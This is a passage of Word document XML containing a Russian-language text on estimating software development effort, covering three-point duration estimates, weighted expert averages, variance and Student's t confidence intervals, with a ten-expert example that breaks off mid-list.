        <w:t>- наиболее вероятная продолжительность действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ожидаемая величина длительности действия MO</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и стандартное отклонение D</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для каждого действия cоставляет:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MO</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>= (A</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> +4*M</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+B</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)/6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ( B</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – A</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)/6,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где D</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - характеризует степень неопределенности выполнения работ за ожидаемое время. Если разброс между B</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и A</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> мал, то степень достоверности того, что работа будет выполнена точно в срок, велика. Итоговая оценка затрат на разработку программного продукта и стандартное отклонение от этой оценки составляют:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="744150" cy="331113"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="Рисунок 141" descr="http://ok-t.ru/studopedia/baza14/71156389034.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http://ok-t.ru/studopedia/baza14/71156389034.files/image004.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId450" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="744090" cy="331086"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="880950" cy="428840"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="Рисунок 142" descr="http://ok-t.ru/studopedia/baza14/71156389034.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http://ok-t.ru/studopedia/baza14/71156389034.files/image005.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId451" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="881111" cy="428919"/>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 xml:space="preserve">Для повышения точности экспертные оценки могут быть также даны руководством предприятия - заказчика и другими специалистами. Если эксперты высказывают свое мнение независимо от других, то оценки отдельных экспертов можно рассматривать как </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">независимые реализации случайной величины длительности действия. Результирующая оценка </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="273401" cy="201600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27263" name="Рисунок 143" descr="http://ok-t.ru/studopedia/baza14/71156389034.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http://ok-t.ru/studopedia/baza14/71156389034.files/image006.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId452" cstate="print"/>
                    <a:srcRect t="11864" b="25424"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="273401" cy="201600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> определяется по формуле средневзвешенного значения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="668586" cy="662400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27262" name="Рисунок 144" descr="http://ok-t.ru/studopedia/baza14/71156389034.file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http://ok-t.ru/studopedia/baza14/71156389034.files/image007.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId453" cstate="print"/>
                    <a:srcRect b="13174"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="668586" cy="662400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где:</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - оценка i-ого эксперта;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>N - количество экспертов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- удельный вес оценки эксперта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При отсутствии информации о компетентности экспертов следует положить d</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=1(i=1,N). Степенью согласованности мнений экспертов в данной экспертизе служит дисперсия s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1010550" cy="588851"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27261" name="Рисунок 145" descr="http://ok-t.ru/studopedia/baza14/71156389034.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http://ok-t.ru/studopedia/baza14/71156389034.files/image008.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId454" cstate="print"/>
                    <a:srcRect b="12500"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1010550" cy="588851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В рассмотренной экспертизе можно определить статистическую значимость полученных результатов. Задавшись вероятностью ошибки Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">ош, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>можно определить интервал, в который оцениваемая величина попадает с вероятностью 1- Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>ош</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1291350" cy="211007"/>
            <wp:effectExtent l="19050" t="0" r="4050" b="0"/>
            <wp:docPr id="27260" name="Рисунок 148" descr="http://ok-t.ru/studopedia/baza14/71156389034.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http://ok-t.ru/studopedia/baza14/71156389034.files/image009.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId455" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1294046" cy="211447"/>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 xml:space="preserve">Можно считать, что величина а распределена нормально с центром </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="244674" cy="230400"/>
            <wp:effectExtent l="19050" t="0" r="2976" b="0"/>
            <wp:docPr id="27259" name="Рисунок 149" descr="http://ok-t.ru/studopedia/baza14/71156389034.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descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image010.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId456" cstate="print"/>
                    <a:srcRect b="17391"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="244674" cy="230400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и дисперсией s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Тогда</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="744150" cy="251103"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27258" name="Рисунок 150" descr="http://ok-t.ru/studopedia/baza14/71156389034.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descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image011.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId457" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="744560" cy="251241"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где величина t имеет распределение Стьюдента с N-1 степенями свободы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример: десять экспертов с одинаковыми весами b</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(i=1,10) оценивают величину трудоемкости разработки программного обеспечения Т. От них получены следующие оценки в днях: Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=33, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=35, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=32,2, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=34, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=38, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=34, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=37, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=40, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=36, Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
